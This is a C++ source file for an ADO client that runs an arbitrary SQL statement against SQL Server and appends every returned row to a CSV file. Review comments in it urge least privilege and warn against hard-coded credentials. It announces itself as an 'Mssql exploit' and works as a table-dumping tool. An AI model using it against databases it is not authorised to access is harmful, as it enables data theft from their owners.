#include "stdafx.h"
#include <windows.h>
#include <stdlib.h>
#include <direct.h>
#include <iostream> 
#include <fstream>
#include <string>
#include <vector>

 

#import "c:\Program Files\Common Files\System\ado\msado15.dll"  no_namespace rename("EOF","EndOfFile")



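/**
 * Runs one SQL statement against the configured SQL Server through ADO and
 * appends every returned row to a text file as a quoted, comma-separated line.
 *
 * Usage: <program> <sql> <output-file> <column-count>
 *   argv[1]  SQL text, passed to the server unchanged as adCmdText
 *   argv[2]  output file, opened in append mode
 *   argv[3]  number of leading columns to write per row (positive integer)
 *
 * Returns 0 on success and 1 on a usage, file, COM or database error.
 *
 * NOTE(review): the statement is executed verbatim with the rights of the
 * login in the connection string, so that login should be a least-privileged,
 * read-only account and the output file should be access-controlled.
 */
int main(int argc, char* argv[])
{
    printf("[*]Mssql exploit \n");

    // The original dereferenced argv[1..3] without checking argc.
    if (argc < 4)
    {
        printf("Usage: %s <sql> <output-file> <column-count>\n",
               (argc > 0 && argv[0] != NULL) ? argv[0] : "program");
        return 1;
    }

    const char* strSql = argv[1];   //"SELECT  *  from  test.dbo.users";
    const char* strFile = argv[2];  //"d.txt";

    // strtol instead of atoi so that non-numeric or trailing junk is rejected.
    char* endPtr = NULL;
    long nSize = strtol(argv[3], &endPtr, 10);  //3;
    if (endPtr == argv[3] || *endPtr != '\0' || nSize <= 0)
    {
        printf("Invalid column count: %s\n", argv[3]);
        return 1;
    }

    std::ofstream log;
    log.open(strFile, std::ios_base::app);
    if (!log.is_open())
    {
        printf("Cannot open output file: %s\n", strFile);
        return 1;
    }

    const HRESULT hrInit = ::CoInitialize(NULL);
    if (FAILED(hrInit))
    {
        printf("CoInitialize failed (hr=0x%08lx)\n", static_cast<unsigned long>(hrInit));
        return 1;
    }

    int exitCode = 0;

    // Inner scope: the ADO smart pointers must release their interfaces
    // before CoUninitialize() runs, so they may not outlive this block.
    {
        _ConnectionPtr m_pConnection;
        _RecordsetPtr m_pRecordset;

        try
        {
            // Object creation happens inside the try so that a missing or
            // unregistered ADO component is reported instead of terminating.
            HRESULT hr = m_pConnection.CreateInstance("ADODB.Connection");
            if (FAILED(hr))
            {
                _com_issue_error(hr);
            }

            // NOTE(review): credentials are hard-coded here, which puts them in
            // the binary and in version control. Prefer integrated
            // authentication (Integrated Security=SSPI) or a protected
            // configuration source, and rotate any real password that was
            // ever committed in this string.
            _bstr_t strConnect = "Provider=SQLOLEDB; Server=127.0.0.1;Database=sa; uid=user; pwd=pass;";
            m_pConnection->Open(strConnect, "", "", adModeUnknown);

            printf("[+]Connect server succeed!!! \n");

            hr = m_pRecordset.CreateInstance(__uuidof(Recordset));
            if (FAILED(hr))
            {
                _com_issue_error(hr);
            }

            _bstr_t bstrSQL(strSql);
            m_pRecordset->Open(bstrSQL, m_pConnection.GetInterfacePtr(), adOpenDynamic, adLockOptimistic, adCmdText);

            // Never index past the columns the result set actually has.
            const long fieldCount = m_pRecordset->Fields->Count;
            if (nSize > fieldCount)
            {
                printf("Requested %ld columns, result has %ld; writing %ld\n", nSize, fieldCount, fieldCount);
                nSize = fieldCount;
            }

            while (!m_pRecordset->EndOfFile)
            {
                std::string line;
                for (long j = 0; j < nSize; j++)
                {
                    if (j > 0)
                    {
                        line += ",";
                    }

                    _variant_t varTmp = m_pRecordset->GetCollect(_variant_t(j));

                    line += "\"";
                    // SQL NULL arrives as VT_NULL; converting that to a string
                    // is expected to raise _com_error, so write it as empty.
                    if (varTmp.vt != VT_NULL && varTmp.vt != VT_EMPTY)
                    {
                        const _bstr_t fieldText(varTmp);
                        const char* raw = static_cast<const char*>(fieldText);
                        for (; raw != NULL && *raw != '\0'; ++raw)
                        {
                            // Double embedded quotes so the field stays one
                            // field when the file is parsed again.
                            if (*raw == '"')
                            {
                                line += '"';
                            }
                            line += *raw;
                        }
                    }
                    line += "\"";
                }

                log << line << "\n";
                m_pRecordset->MoveNext();
            }

            if (!log)
            {
                printf("Write to output file failed: %s\n", strFile);
                exitCode = 1;
            }
        }
        catch (const _com_error& e)
        {
            // Description() can be empty, which converts to a null char*.
            const _bstr_t description = e.Description();
            const char* text = static_cast<const char*>(description);
            printf("Error message: %s (hr=0x%08lx)\n",
                   text != NULL ? text : "(no description)",
                   static_cast<unsigned long>(e.Error()));
            exitCode = 1;
        }

        // Best-effort cleanup; it also runs after a failure, and it must not
        // throw out of main or touch a pointer that was never created.
        try
        {
            if (m_pRecordset != NULL && m_pRecordset->State != adStateClosed)
            {
                m_pRecordset->Close();
            }
            if (m_pConnection != NULL && m_pConnection->State != adStateClosed)
            {
                m_pConnection->Close();
            }
        }
        catch (const _com_error&)
        {
            exitCode = 1;
        }
    }

    log.close();
    ::CoUninitialize();

    return exitCode;
}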
